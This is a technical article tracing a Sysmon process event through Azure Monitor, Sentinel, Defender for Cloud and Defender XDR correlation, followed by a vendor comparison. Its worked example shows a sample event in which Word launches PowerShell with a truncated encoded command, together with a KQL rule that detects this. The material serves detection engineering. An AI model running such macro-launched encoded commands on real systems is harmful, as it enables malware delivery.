sequenceDiagram autonumber participant K as Host kernel (Sysmon) participant LA as Log Analytics workspace participant SEN as Sentinel scheduled rule participant MDC as MDC for Servers alert participant MDE as MDE native detection participant XDR as Defender XDR correlation K->>LA: 14:03:21 -- Event row (ProcessGuid abc) LA->>SEN: 14:05:00 -- 5-min query fires SEN->>XDR: 14:05:04 -- SecurityAlert from KQL K->>MDE: 14:03:17 -- local EDR sensor signal MDE->>MDC: 14:06:30 -- MDE telemetry surfaces MDC alert MDC->>XDR: 14:07:42 -- SecurityAlert from MDC plan MDE->>XDR: 14:08:11 -- DeviceAlertEvents direct XDR->>XDR: 14:09:30 -- merge on host + ProcessGuid -> Incident I-7842

Two things in the diagram deserve to be noticed. First, the three alerts arrive in a window that is small but not synchronous: about six minutes from earliest to latest, all gated by the slowest pipeline (Sentinel's five-minute scheduled query). Second, MDE shows up twice: once as the source that feeds MDC's CWPP plan (hop 5 in the master diagram), and once as a native Defender XDR alert source. The two are the same sensor data routed through two different alert grammars to the same correlation surface. The fact that the correlation engine deduplicates them on ProcessGuid is not accidental -- it is the load-bearing identifier that makes the unification work for endpoint events. For non-endpoint sources (cloud-control-plane alerts from MDC for Storage, for example), there is no equivalent shared identifier, and the deduplication has to fall back on weaker entity matches like account name or IP. That is where the convergence frays.

The next section walks the six hops in order, naming the artifact at each hop and the failure mode that lives there. Hops 1 through 4 are the SIEM lineage. Hop 5 is the CWPP lineage. Hop 6 is the XDR fan-in.

6. Walking the six hops

6.1 Hop 1 -- The kernel emission

The Sysmon driver -- SysmonDrv.sys -- is registered as a Windows boot-start driver under HKLM\SYSTEM\CurrentControlSet\Services\SysmonDrv with Start=0, which means the I/O manager loads it during the early-boot phase before the bulk of user-mode services start; it also registers as an event-tracing-for-Windows (ETW) provider. On every process creation, it hooks the kernel's PsSetCreateProcessNotifyRoutineEx callback, builds an event record, and writes it to the Windows event log channel Microsoft-Windows-Sysmon/Operational [@ms-learn-sysmon] [@ms-learn-defrag-tools-sysmon]. The record carries roughly thirty fields, including the parent and child image paths, the command lines, the user SID, the integrity level, the hashes (configurable: MD5, SHA1, SHA256, IMPHASH), the parent and child ProcessGuid values, and the kernel-side timestamp.

A common slip: Sysmon's driver is not an Early Launch Anti-Malware (ELAM) driver. ELAM is a separate, stricter Windows category for anti-malware vendors whose drivers must be certified by Microsoft and registered under HKLM\SYSTEM\CurrentControlSet\Control\EarlyLaunch. Sysmon ships as an ordinary boot-start driver (Start=0 under its Services\SysmonDrv key); it loads early enough to observe most user-mode activity from the start, but it does not occupy the ELAM slot. A reader who internalizes the wrong classification will go looking for a SysmonDrv entry under EarlyLaunch and not find one [@ms-learn-sysmon].

A 128-bit identifier Sysmon assigns to every new process. Unlike the OS-assigned PID, which the kernel can recycle as processes exit, ProcessGuid is unique across the host's lifetime and lets downstream tooling reassemble a process tree even after PIDs have been reused. The Microsoft Sysmon page documents the property -- "a unique value for this process across a domain to make event correlation easier" -- but does not document how the GUID is constructed; downstream KQL queries and Defender XDR's advanced hunting schema rely only on its uniqueness, not on its internal composition [@ms-learn-sysmon].

There is a subtle field nuance worth knowing. Sysmon also emits LogonGuid, LogonId, and User on a ProcessCreate event. These three are post-impersonation values -- they reflect the security context the new process was created under, which can differ from the token of the parent. For service-impersonation chains (a service spawning a child under a different account), ignoring this distinction will mislead an analyst on who "owned" the process. KQL detection queries should project both parent and child user/SID and reconcile them explicitly.

For the worked example, the kernel emission at 14:03:17 UTC contains, among other fields:

EventID:       1
TimeCreated:   2026-06-02T14:03:17.412Z
Computer:      MAL-CONTOSO-PRD-04
ProcessGuid:   {62b9c5cf-7c64-67ab-2e00-000000003200}
ProcessId:     8124
Image:         C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine:   powershell.exe -EncodedCommand JABwAD0AJwBoAHQAdABwADoALwAv...
ParentProcessGuid:   {62b9c5cf-7b21-67ab-2c00-000000003200}
ParentProcessId:     6210
ParentImage:   C:\Program Files\Microsoft Office\root\Office16\winword.exe
ParentCommandLine:   "winword.exe" /n "C:\Users\jdoe\Downloads\invoice.docm"
User:          CONTOSO\jdoe
IntegrityLevel: Medium
Hashes:        SHA256=04ED...

Nothing further happens at hop 1 until someone reads the channel. The kernel will not push the event off the host; it will only sit in the local event log, rotating by size or age, until an agent picks it up. That is hop 2.

6.2 Hop 2 -- Azure Monitor Agent shipping via a Data Collection Rule

The agent that reads the Sysmon channel and ships it to the workspace is the Azure Monitor Agent (AMA). AMA replaced the older Microsoft Monitoring Agent (MMA) / Log Analytics agent, which Microsoft retired effective August 31, 2024 [@ms-learn-laa-deprecated]. Customers still running MMA past that date are in unsupported territory, and -- this is the critical operational fact -- AMA does not automatically pick up where MMA left off. AMA requires explicit migration: a Data Collection Rule (DCR) describing which events to collect and which workspace to send them to [@ms-learn-ama-migration].

A modern Microsoft agent that runs on Windows and Linux servers (Azure VM, Arc-enabled, or on-prem) and ships event logs, performance counters, syslog, and custom text files to one or more Log Analytics workspaces, driven entirely by Data Collection Rule (DCR) configurations [@ms-learn-ama-overview]. An ARM-managed configuration object that names a data source type (e.g., `windowsEventLogs`), an XPath-based subscription (which channels and which event IDs), and one or more destinations (typically a `logAnalyticsWorkspace` + `streams` mapping such as `Microsoft-Event` for the generic `Event` table or `Microsoft-WindowsEvent` for the more recent typed Windows event ingestion path). DCRs are assigned to one or more agents via a Data Collection Rule Association (DCRA) [@ms-learn-dcr-overview] [@ms-learn-ama-windows-events]. flowchart LR CH["Windows event channels (XPath subscription)"] AMA["Azure Monitor Agent process"] DCR["Data Collection Rule (cached locally)"] ING["Log Analytics ingestion endpoint -- regional HTTPS"] TBL["Workspace table -- Event / SecurityEvent / WindowsEvent"] CH --> AMA DCR --> AMA AMA --> ING ING --> TBL classDef cfg fill:#fff5d6,stroke:#b7791f,color:#5f370e classDef agent fill:#e8f4ff,stroke:#2b6cb0,color:#1a365d classDef sink fill:#e6fffa,stroke:#319795,color:#234e52 class DCR cfg class AMA,CH agent class ING,TBL sink

Note: The MMA-to-AMA silent-miss trap. A workspace that is still in transition between MMA and AMA can have agents on the same host both running, both shipping the same Event row, and producing double counts. Worse, a host that has had MMA uninstalled but a DCR mis-assigned will stop shipping entirely -- and because Sysmon writes to the local event log no matter what, no alert fires on the host itself. The first signal of the gap is silence in the Event table for that Computer value, which a Sentinel "stale data source" watchdog rule must explicitly detect. Microsoft retired MMA effective August 31, 2024 [@ms-learn-laa-deprecated].

For the Sysmon channel specifically, AMA needs a DCR whose windowsEventLogs block names the XPath subscription Microsoft-Windows-Sysmon/Operational!*[System[(EventID=1)]] (or a broader filter that includes EventIDs 1, 3, 7, 8, 10, 11). The stream name in the destination block determines which table the record lands in: a DCR that names Microsoft-Event ships into the generic Event table; one that names Microsoft-WindowsEvent ships into the newer WindowsEvent table; and naming anything else silently emits nothing [@ms-learn-ama-windows-events] [@ms-learn-sentinel-data-connectors-ref]. The AMA does not log a hard error in this case; the events simply never appear, and the analyst sees a dashboard that is missing the wave.

Hop 2 finishes at about 14:03:19 UTC for the worked example -- two seconds after the kernel emission. The record is now in the workspace's ingest buffer.

6.3 Hop 3 -- Workspace ingestion and the table-choice question

The ingestion endpoint validates the record against the named stream's schema, applies any DCR-side transformations, and persists the row into the destination table. From here on the record is queryable via KQL with end-to-end ingestion latency typically in the low minutes [@ms-learn-event-table]. For the Sysmon channel the destination table is almost always Event, because the SecurityEvent table is the Windows Security channel only (the AMA securityEvents data source), and the Sysmon channel is a separate operational channel [@ms-learn-securityevent-table].

The table choice matters because it changes the shape of the row and the cost of querying it. The two relevant tables for Windows event data behave as follows:

Property	`Event` (Microsoft-Event stream)	`WindowsEvent` (Microsoft-WindowsEvent stream)
Source	AMA `windowsEventLogs` data source [@ms-learn-ama-windows-events]	AMA `windowsEventLogs` data source (newer typed path) [@ms-learn-ama-windows-events]
EventData shape	XML in `EventData` column (string)	Pre-parsed JSON in `EventData` (dynamic)
Cost characteristic	Standard ingest pricing [@ms-learn-sentinel-billing]	Standard ingest pricing
Best for	Mixed sources, simple filters	Channels with deep parsing needs
KQL parse pattern	`parse_xml(EventData)` per row	Direct property access

In production, most Sysmon-on-Windows pipelines run on the older Event table with a parse_xml(EventData) shim. The parse is not cheap -- it allocates per row -- but it is the most common pattern because the older table predates the typed WindowsEvent path and customer queries already exist against it. New deployments should consider the newer table if their detection logic touches many fields per row [@ms-learn-ama-windows-events].

A representative KQL detection that runs against the older Event table for the worked example looks like the snippet below. Show it to a SOC analyst and they will read it left-to-right; show it to a Kusto engineer and they will tell you the parse_xml is the expensive part.

The KQL that parses a Sysmon event out of the older Event table follows a four-step idiom that is worth walking explicitly, because the same shape appears in every detection a SOC writes against XML-shaped Windows event data. Step one: parse_xml(EventData) reads the entire EventData payload (a string column) and returns a dynamic JSON tree whose root is DataItem.EventData and whose interesting children are an array of <Data Name="...">value</Data> elements [@ms-learn-kusto-parse-xml]. Step two: mv-expand ev = ...DataItem.EventData.Data flattens that array so each <Data> child becomes its own row -- a long-form representation where one event becomes thirty rows, one per field. Step three: extend Field = tostring(ev["@Name"]), Value = tostring(ev["#text"]) projects the XML attribute and text payload into two typed columns named Field and Value. Step four: evaluate pivot(Field, take_any(Value), TimeGenerated, Computer) invokes the Kusto pivot plugin, which rotates the long-form (Field, Value) rows back into a wide row with one column per field name -- so after the pivot, CommandLine, Image, ParentImage, and ProcessGuid become first-class columns the detection can filter on as if they had been typed all along [@ms-learn-kusto-pivot-plugin]. The same chain adapts to any other EventID (3 / NetworkConnect, 11 / FileCreate, etc.) and, with one less hop, to the typed WindowsEvent table where EventData is already pre-parsed JSON.

Quick reference, in margin form: parse_xml(EventData) -> dynamic JSON tree; mv-expand ev = ...EventData.Data -> one row per <Data> element; extend Field/Value -> typed Field/Value columns; evaluate pivot(Field, take_any(Value), ...) -> wide row, one column per field. The pivot step is what turns "thirty long-form rows" into "one wide row with named columns"; without it the detection has to filter on the Field/Value pairs directly, which is much harder to write and to read [@ms-learn-kusto-pivot-plugin].

```kql Event | where TimeGenerated > ago(5m) | where Source == "Microsoft-Windows-Sysmon" and EventID == 1 | extend ev = parse_xml(EventData).DataItem.EventData.Data | mv-expand ev | extend Field = tostring(ev["@Name"]), Value = tostring(ev["#text"]) | evaluate pivot(Field, take_any(Value), TimeGenerated, Computer) | where ParentImage endswith "winword.exe" and Image endswith "powershell.exe" and CommandLine contains "-EncodedCommand" | project TimeGenerated, Computer, User, ParentImage, ParentProcessGuid, Image, ProcessGuid, CommandLine, Hashes | extend HostCustomEntity = Computer, AccountCustomEntity = User, ProcessCustomEntity = ProcessGuid ```

The five lines after the pivot are the actual detection: an Office process spawning PowerShell with -EncodedCommand. The three *CustomEntity columns at the bottom are what wire this alert into the Defender XDR correlation engine at hop 6 -- they become typed entities on the resulting SecurityAlert row [@ms-learn-sentinel-entities].

Note: Why the row of CustomEntity columns matters. A Sentinel analytics rule that produces a SecurityAlert without entity mappings will still alert -- and will still be readable by an analyst -- but it will not participate in cross-pipeline correlation at hop 6. The XDR fan-in matches on entity values, and an alert with no entities has nothing to match on. This is a common oversight when migrating older queries into Sentinel from on-prem SIEMs that did not have an equivalent concept.

Hop 3 finishes at about 14:03:21 UTC: four seconds after kernel emission, with the row written to the workspace's Event table and indexed for KQL query.

6.4 Hop 4 -- Sentinel analytics rule emits a SecurityAlert

Microsoft Sentinel supports several detection-rule shapes. The five that matter for understanding the Sysmon pipeline are summarized below, with the timing characteristics that drive end-to-end latency for hop 4.

A KQL query that Sentinel runs on a fixed schedule (default 5 minutes, minimum 5 minutes). When the query returns rows, each row -- subject to grouping configuration -- becomes a `SecurityAlert` row in the workspace and an alert object in Sentinel and in Defender XDR [@ms-learn-sentinel-scheduled-rules]. The Sentinel-rule configuration that names which output columns of the KQL detection map to which typed entities (Account, Host, Process, IP, URL, FileHash, etc.). Without entity mappings, an alert is "orphan" with respect to the Defender XDR correlation engine [@ms-learn-sentinel-entities].

The five rule shapes and where they fire in the Sysmon path:

Rule type	Query cadence	Typical end-to-end latency	Sysmon use
Scheduled analytics [@ms-learn-sentinel-scheduled-rules]	Every 5+ min	5-8 min from ingest	The default for ProcessCreate detections
Near-real-time (NRT) [@ms-learn-sentinel-nrt-rules]	Every 1 min	1-2 min from ingest	High-priority single-event matches
Microsoft security (parent-product)	Tied to source product	Sub-minute	Pass-through for MDE / MDC / MDCA alerts
Fusion (multistage) [@ms-learn-sentinel-fusion]	ML-driven, continuous	Hours	Cross-source attack-pattern detection
Threat-intelligence map [@ms-learn-sentinel-threat-detection]	Continuous	Sub-minute	IOC matching on `Event`-derived hashes

For the worked example, the detection runs as a scheduled analytics rule at five-minute cadence. The rule fires at 14:05:00 UTC, the query returns one row matching winword.exe -> powershell.exe -EncodedCommand, and a SecurityAlert is emitted at 14:05:04 UTC. The alert carries the HostCustomEntity, AccountCustomEntity, and ProcessCustomEntity mappings that the rule defined.

{`// Three alerts arriving from three pipelines, each with entities. const sentinelAlert = { source: 'Sentinel', time: '14:05:04Z', entities: { Host: 'MAL-CONTOSO-PRD-04', Process: '{62b9c5cf-7c64-67ab-2e00-000000003200}' } }; const mdcAlert = { source: 'MDC for Servers (via MDE)', time: '14:07:42Z', entities: { Host: 'MAL-CONTOSO-PRD-04', File: 'powershell.exe' } }; const mdeAlert = { source: 'MDE native', time: '14:08:11Z', entities: { Host: 'MAL-CONTOSO-PRD-04', Process: '{62b9c5cf-7c64-67ab-2e00-000000003200}' } }; function correlate(alerts, windowMin = 30) { const byHost = new Map(); for (const a of alerts) { const k = a.entities.Host; if (!byHost.has(k)) byHost.set(k, []); byHost.get(k).push(a); } return [...byHost.entries()].map(([host, alts]) => ({ incidentKey: 'host:' + host, alerts: alts.map(a => a.source) })); } console.log(correlate([sentinelAlert, mdcAlert, mdeAlert])); // -> [{ incidentKey: 'host:MAL-CONTOSO-PRD-04', // alerts: ['Sentinel','MDC for Servers (via MDE)','MDE native'] }] `}

The toy correlator above only keys on Host. The real one also keys on Process (ProcessGuid where present), Account, IP, URL, and FileHash, and uses a sliding window plus a confidence-weighted merge that allows weak entities (file name) to participate when strong entities (ProcessGuid) overlap [@ms-learn-xdr-correlation]. The result is the same: three alerts in, one incident out.

Two other Sentinel detection paths deserve a mention even though they did not fire for this specific worked example. UEBA anomalies -- when enabled, Sentinel writes per-user and per-host baselines into BehaviorAnalytics and IdentityInfo tables; analytics rules can join these to flag a normally-quiet jdoe spawning encoded PowerShell as anomalous independent of any specific signature [@ms-learn-sentinel-threat-detection]. Fusion is an ML-driven multistage detector that operates over the broader alert + event corpus and emits Fusion-named incidents when it sees a chain that resembles an attack pattern (e.g., a phishing alert followed by a credential-access alert followed by a process-spawn anomaly within an hour on the same identity) [@ms-learn-sentinel-fusion]. Fusion's strength is correlation across products you would not have thought to correlate manually; its weakness is opacity, which §9 returns to.

There is one further detection family worth introducing here because §10's recipe will explicitly avoid it: Defender XDR Custom Detections. These are KQL queries authored not in Sentinel but in the unified portal's advanced hunting surface, and they emit alerts directly into Defender XDR rather than via the SIEM analytics-rule pipeline [@ms-learn-sentinel-custom-detections]. Custom detections can read DeviceProcessEvents and the rest of the Defender advanced hunting schema, which is fed by the MDE sensor independent of Sysmon. For the worked example, a Custom Detection equivalent to the Sentinel scheduled rule would also have fired -- but it would have fired against MDE's DeviceProcessEvents table, not against Log Analytics Event. The two paths are not interchangeable. Microsoft's documentation is explicit that custom detections operate over the Defender XDR-internal advanced hunting schema, not over arbitrary Log Analytics tables [@ms-learn-sentinel-custom-detections] [@ms-learn-advanced-hunting].

Custom detection rules are rules you can design and tweak using advanced hunting queries. These rules let you proactively monitor various events and system states, including suspected breach activity and misconfigured endpoints. [@ms-learn-sentinel-custom-detections]

That is the policy line that decides where to put a new rule: if your query reads from DeviceProcessEvents (MDE feed), it belongs as an advanced-hunting custom detection inside Defender XDR; if your query reads from Sentinel Event or SecurityEvent (Log Analytics feed), it belongs as a Sentinel analytics rule. The recipe in §10 picks the Sentinel side because the worked example begins in Sysmon, not in MDE -- and Sysmon flows to Log Analytics, not to the MDE advanced-hunting schema.

6.5 Hop 5 -- Microsoft Defender for Cloud as the CWPP alert source

This hop is the most architecturally interesting and the most operationally misunderstood. It is also where the previous iteration of this article had to be corrected on its single most load-bearing detail, so the framing here is deliberate.

Key idea: Only Microsoft Defender for Cloud's CWPP alerts flow into Defender XDR -- not its CSPM posture findings. A Secure Score recommendation that "VMs should have endpoint protection installed" or "Storage accounts should restrict public access" is a posture finding. A "Suspicious PowerShell command line detected on MAL-CONTOSO-PRD-04" emitted by the Defender for Servers runtime plan is an alert. Defender XDR ingests the alerts; the posture findings stay in the MDC blade [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest].

The vocabulary first, because everything in this section depends on it.

Continuous assessment of cloud-resource configuration against a baseline of best practices (Microsoft cloud security benchmark, CIS, NIST 800-53, etc.). Output is *recommendations* and a *Secure Score*. CSPM does not see runtime telemetry. In Microsoft's stack, CSPM is the foundational layer of Microsoft Defender for Cloud and is free to enable [@ms-learn-mdc-introduction] [@ms-learn-secure-score]. Runtime detection on a deployed cloud workload -- a VM, a container, a SQL database, a storage account, an App Service. CWPP sees actual events (process spawns, network connections, control-plane API calls) and emits *alerts*. In MDC, CWPP is delivered as paid plans: Defender for Servers, Containers, SQL, Storage, App Service [@ms-learn-mdc-introduction] [@ms-learn-mdc-cwpp-features]. The default CSPM control framework that ships with Microsoft Defender for Cloud. MCSB is Microsoft's interpretation of CIS, NIST 800-53, and PCI DSS controls mapped to Azure, AWS, and GCP resource types. Recommendations are scored against MCSB by default; other frameworks can be added [@ms-learn-mcsb-overview].

The CSPM-versus-CWPP distinction has direct operational consequences for what shows up at hop 6:

What MDC emits	Where it lives	Flows to Defender XDR?
Recommendation (CSPM) -- e.g., "Endpoint protection should be installed"	Recommendations blade in MDC + `SecurityRecommendation` table	No [@ms-learn-mdc-xdr-concept]
Secure Score (CSPM) -- aggregate over recommendations	Secure Score blade in MDC	No [@ms-learn-secure-score]
Compliance assessment (CSPM) -- per-framework rollup	Regulatory compliance blade	No
Alert (CWPP) -- e.g., "Suspicious PowerShell command line"	Alerts blade in MDC + `SecurityAlert` table	Yes [@ms-learn-mdc-xdr-ingest]
Container runtime alert -- e.g., "Web shell detected in pod"	MDC Alerts + `SecurityAlert`	Yes [@ms-learn-mdc-containers]
Storage runtime alert -- e.g., "Anomalous access from Tor IP"	MDC Alerts + `SecurityAlert`	Yes [@ms-learn-mdc-storage]

The CWPP alerts come from MDC's five priced runtime plans. Each plan has its own data path, but they all converge on the same SecurityAlert table in Log Analytics and on the same XDR ingestion path:

MDC plan	Workload	Data source	Reference
Defender for Servers	Windows / Linux VMs, Arc	MDE sensor + agent telemetry	[@ms-learn-mdc-defender-servers] [@ms-learn-mdc-mde-integration]
Defender for Containers	AKS, EKS, GKE pods	runtime sensor + Kubernetes audit	[@ms-learn-mdc-containers]
Defender for SQL	Azure SQL, Arc SQL	Azure SQL Advanced Threat Protection signals	[@ms-learn-mdc-sql] [@ms-learn-azuresql-atp]
Defender for Storage	Storage accounts	Control plane + blob access patterns	[@ms-learn-mdc-storage]
Defender for App Service	App Service apps	Process + network signal from the worker	[@ms-learn-mdc-appservice]

For the worked example, the relevant plan is Defender for Servers. Because MDE is installed on the host (Defender for Servers Plan 2 includes the MDE license), the MDE sensor's runtime telemetry feeds into MDC's detection engine and emits the Suspicious PowerShell command line MDC alert at 14:07:42 UTC [@ms-learn-mdc-mde-integration] [@ms-learn-mde-onboard-windows]. That alert flows to Defender XDR via the MDC-to-XDR alert-ingestion integration that reached general availability in March 2024 (specifically March 13, 2024) [@ms-learn-mdc-xdr-ingest] [@ms-learn-mdc-xdr-concept].

Note: Do not assume MDC posture findings will appear in your Defender XDR incident. The MDC-to-XDR integration ingests alerts only, not recommendations and not Secure Score deltas. If a SOC analyst wants posture context on an incident-affected host (e.g., "was this host's endpoint protection missing per Secure Score?"), they must pivot to the MDC blade or join SecurityRecommendation from KQL. There is no automatic incident-side enrichment for posture findings as of the documented integration scope [@ms-learn-mdc-xdr-concept] [@ms-learn-mdc-xdr-ingest].

The CSPM/CWPP separation also explains the multi-cloud story. MDC's CSPM scope spans Azure, AWS, and GCP via cloud connectors -- you can onboard an AWS account with aws-onboarding and see your S3 buckets in the Secure Score [@ms-learn-mdc-onboard-aws]. The CWPP plans for non-Azure clouds are narrower: Defender for Servers works on AWS EC2 and on-prem via Azure Arc, Defender for Containers works on EKS and GKE, but several plans (Storage, App Service) are Azure-only. The result is a posture surface that is genuinely multi-cloud and a runtime surface that is mostly Azure-plus-Arc -- which is the layer that actually flows to XDR at hop 6 [@ms-learn-mdc-introduction].

6.6 Hop 6 -- The Defender XDR correlation engine and the fan-in

The last hop is the merge. The Defender XDR correlation engine reads incoming alerts from all source pipelines, normalizes the entity values they carry, and groups alerts whose entities overlap within a sliding time window into a single incident. The grouping is asymmetric: a higher-confidence alert (e.g., an MDE process-tree alert with a strong ProcessGuid) can pull in lower-confidence alerts (e.g., a Sentinel rule whose only entity is Host), but not vice-versa [@ms-learn-xdr-correlation].

The server-side service that reads alerts from connected sources, computes entity overlap and temporal proximity, and merges related alerts into incidents. The engine is not user-configurable in detail; merge thresholds, time windows, and entity-priority rules are Microsoft-managed defaults [@ms-learn-xdr-correlation] [@ms-learn-defender-xdr-incidents].

The geometry of the fan-in for the worked example is the mirror image of the fan-out in section 5. The same three alerts that arrived at three different timestamps now converge on a single incident object I-7842:

sequenceDiagram autonumber participant SEN as Sentinel SecurityAlert participant MDC as MDC SecurityAlert participant MDE as MDE DeviceAlertEvents participant COR as Defender XDR correlator participant INC as Incident I-7842 SEN->>COR: Host MAL-... ProcessGuid abc at 14:05:04 MDC->>COR: Host MAL-... File powershell.exe at 14:07:42 MDE->>COR: Host MAL-... ProcessGuid abc at 14:08:11 Note over COR: match window ≤ 30 min COR->>INC: open incident, attach Sentinel alert COR->>INC: merge: MDE matches on ProcessGuid COR->>INC: merge: MDC matches on Host within window INC-->>SEN: backlink to source alert INC-->>MDC: backlink to source alert INC-->>MDE: backlink to source alert

Three things deserve explicit attention in this fan-in:

The strong-entity priority. The MDE alert and the Sentinel alert share ProcessGuid. Microsoft documents that field as a unique value designed to make event correlation easier across hosts and domains [@ms-learn-sysmon]. The merge between them is unambiguous. The MDC-from-Servers alert only carries Host and File -- the MDC plan's alert grammar does not necessarily emit ProcessGuid even though the underlying MDE sensor knows it. The MDC alert merges into the incident on the weaker Host match within the time window.
The Microsoft-managed thresholds. The correlation window, the entity-priority rules, and the merge logic are not exposed for customer tuning. They are documented at the policy level -- "alerts that share entities within a time window" -- but the exact heuristics are part of the Defender XDR service [@ms-learn-xdr-correlation]. §9 returns to this opacity as an open problem.
What does NOT merge. Some categories of source data stay outside the incident graph even when they ought to: cross-workspace Sentinel rules (alerts in a workspace other than the Defender-XDR-connected "primary" one), third-party connector alerts that lack entity mappings, and -- as already underlined -- MDC posture findings of every kind [@ms-learn-mdc-xdr-concept].

The "primary workspace" constraint matters for multi-workspace customers. A Defender XDR tenant connects to exactly one Sentinel primary workspace for the unified secops experience. Sentinel alerts from secondary workspaces still exist as alerts, can still trigger automation rules, and are still queryable via cross-workspace KQL -- but they do not appear in the unified incident graph at security.microsoft.com [@ms-learn-unified-secops] [@ms-learn-move-to-defender]. Customers with regional workspace topologies (e.g., one per Azure region for data-residency reasons) need to plan which workspace is the XDR-connected one.

For the worked example, hop 6 completes at 14:09:30 UTC: the SOC analyst sees a single incident in their queue, titled Multi-stage incident on one endpoint, with three correlated alerts on its alerts tab, a unified entity graph showing the host, the user, the parent and child processes, the file hash, and the URL embedded in the encoded command line, and one-click pivots to the MDE timeline, the Sentinel investigation graph, and the MDC alert detail. Three pipelines, one analyst surface, nine minutes thirteen seconds end-to-end.

That is the full path. The next three sections compare it to what other vendors do, name the theoretical limits any such pipeline has to live with, and walk the open problems that even the best-tuned version of this pipeline still faces.

7. Competing approaches: inside and outside the Microsoft fence

The architecture in §6 is one answer to "how do I turn endpoint telemetry into a SOC incident." It is not the only answer. Other detection engines exist both inside Microsoft and outside, with materially different design choices that are useful to compare side-by-side.

Inside Microsoft, six detection engines run on roughly the same data over the same workspace -- and an architect picking where to put a new detection has to know what each one optimizes for.

Engine	Where the query runs	Latency	Best fit
Sentinel scheduled rule	Log Analytics KQL, every 5+ min	5-8 min	Cross-source SIEM detections, free-form KQL [@ms-learn-sentinel-scheduled-rules]
Sentinel NRT rule	Log Analytics KQL, every 1 min	1-2 min	High-priority single-row detections [@ms-learn-sentinel-nrt-rules]
Sentinel Fusion	ML, multi-source	Hours	Multistage attack patterns, low-signal corroboration [@ms-learn-sentinel-fusion]
Defender XDR custom detection	Advanced hunting KQL, periodic	5-30 min	Detections over `DeviceProcessEvents` / MDE schema [@ms-learn-sentinel-custom-detections]
MDE built-in detections	In-product behavioural	Seconds-to-minutes	Endpoint-local process / file / network signatures [@ms-learn-mde-landing]
MDC plan built-in detections	Per-plan engines	Seconds-to-minutes	Per-workload runtime detection (containers, SQL, storage) [@ms-learn-mdc-introduction]

The takeaway is that Sentinel and Defender XDR custom detections are not interchangeable. They read from different schemas (Log Analytics tables vs MDE advanced-hunting tables), they have different governance models (Azure RBAC vs Defender role-based access), and they emit alerts via different paths. The right engine depends on where your telemetry lives. For the worked example, Sysmon in Event is reached by Sentinel, not by Custom Detections; MDE's DeviceProcessEvents for the same host is reached by Custom Detections, not by Sentinel scheduled rules.

Outside Microsoft, the six widely-deployed alternative stacks each make different trade-offs:

Stack	Storage	Query language	Strength	Cost shape
Splunk Enterprise Security	Splunk indexers	SPL	Long-installed, deep app catalog, mature SOAR	License-tier (GB/day) or workload-based
Splunk Cloud + ES	Splunk-managed cloud	SPL	Same SPL, SaaS-managed	Per-ingest workload-priced
Elastic Security	Elasticsearch	EQL + ES	QL	Open-source community, full-text strength
Google SecOps (Chronicle)	Google-internal columnar	YARA-L 2 + UDM	Petabyte-scale retention, fixed bytes-per-employee pricing	Per-employee (no per-GB)
AWS Security Lake + Athena	S3 + OCSF	Athena SQL	Open-schema, bring-your-own-detection	Per-ingest + per-query
Sigma + open-source SIEM	Vendor-neutral rule format, translates to many SIEMs	Sigma YAML	Portable detection rules	Free format; SIEM cost varies

Sigma deserves a special mention because it is a rule format, not a SIEM. Sigma rules describe detections in a vendor-neutral YAML schema and are translated by a converter (sigmac) into the target SIEM's native query language -- KQL for Sentinel, SPL for Splunk, ES|QL for Elastic, YARA-L for Google SecOps [@sigmahq-sigma]. The result is that a single Sigma rule for "Office process spawns PowerShell with encoded command" can be deployed across multiple SIEMs without rewriting. The trade-off is that Sigma compiles to the lowest common denominator of expressiveness; complex multi-table joins do not translate cleanly. Microsoft Sentinel supports Sigma rule import via the analytics-rule wizard [@sigmahq-sigma].

The structural difference that matters most across these stacks is where the storage and query engine live. Splunk on-prem owns its full stack and bills on ingest. Elastic gives you the stack and lets you self-host or buy SaaS. Google SecOps removes the per-GB axis entirely and bills per employee, betting that the value of the SOC is the analyst's time, not the byte count. AWS Security Lake decomposes further than Microsoft does, exposing S3 directly so you can bring any analytics engine. Microsoft's design point -- KQL over Log Analytics with grafted XDR correlation -- sits in the middle: more managed than AWS, more opinionated than Elastic, billed per-GB like Splunk but with separable axes.

There is also a migration option worth knowing about. Microsoft introduced a Sentinel SIEM migration experience in 2024 that uses generative AI to translate detection rules from Splunk SPL to KQL [@ms-learn-sentinel-siem-migration]. The tool is not a complete replacement for human review of every translated rule, but it materially shortens the migration spike that has historically blocked SOCs from switching SIEMs. The existence of such a tool is itself evidence that the SIEM market is becoming more substitutable than it once was -- a SOC's investment in detection logic is no longer locked to one vendor's query language.

For the worked example specifically, every one of the alternative stacks could in principle deliver the same end result -- one incident for a parent-child process-spawn detection. The differences are in the operating model: who owns the storage, who owns the agent, who priced the ingest, and how easily the analyst can pivot from the incident into raw telemetry. Microsoft's pitch with the unified secops platform is that "all of the above are in one portal." The honest reading is "the Microsoft-side ones are in one portal, and the third-party feeds you stream into Sentinel still participate via the same SecurityAlert table."

8. Theoretical limits

The six-hop pipeline is mostly an engineering object. But it inherits a few honestly theoretical limits that no amount of clever product design can defeat. Naming them sharply is the difference between an architect who knows what the system cannot do and a buyer who is surprised.

The general problem of deciding when two records in different data sources refer to the same real-world entity. In the SIEM context, the entities are users, hosts, files, processes, IPs, URLs, and email recipients. Strong identifiers (a hardware-rooted DeviceId, a Microsoft Entra ObjectId, a SHA256 hash) make the problem tractable; weak identifiers (an account name, an IP address, a file name) make it probabilistic [@ms-learn-sentinel-entities].

The first hard limit is that entity resolution across pipelines is structurally probabilistic whenever the strong identifiers are missing. The Defender XDR correlator depends on entity overlap; the worked example merged cleanly because ProcessGuid was shared between MDE and Sentinel. Take that identifier away and the merge falls back on Host, which is shared but ambiguous (hostnames are reused, machine accounts get recycled), and ultimately on weaker identifiers like file name or command-line substring. The table below names what identifiers each source pipeline can be relied upon to carry.

Entity type	Strong identifier (when available)	Weak fallback	Pipelines that emit the strong form
Host	DeviceId (MDE GUID), Azure resourceId	Hostname, FQDN	MDE, MDC for Servers, Sentinel (if mapped)
Process	ProcessGuid (Sysmon/MDE)	Image path + start time	Sysmon, MDE, advanced hunting
Account	Microsoft Entra ObjectId	UPN, samAccountName	Microsoft Entra ID logs, MDI
File	SHA256	Filename, MD5	MDE, Sentinel rules that include hash
IP	n/a (probabilistic by definition)	IP literal	All
URL	Normalized URL with scheme	Bare host	MDE, Defender for Office, threat-intel feeds

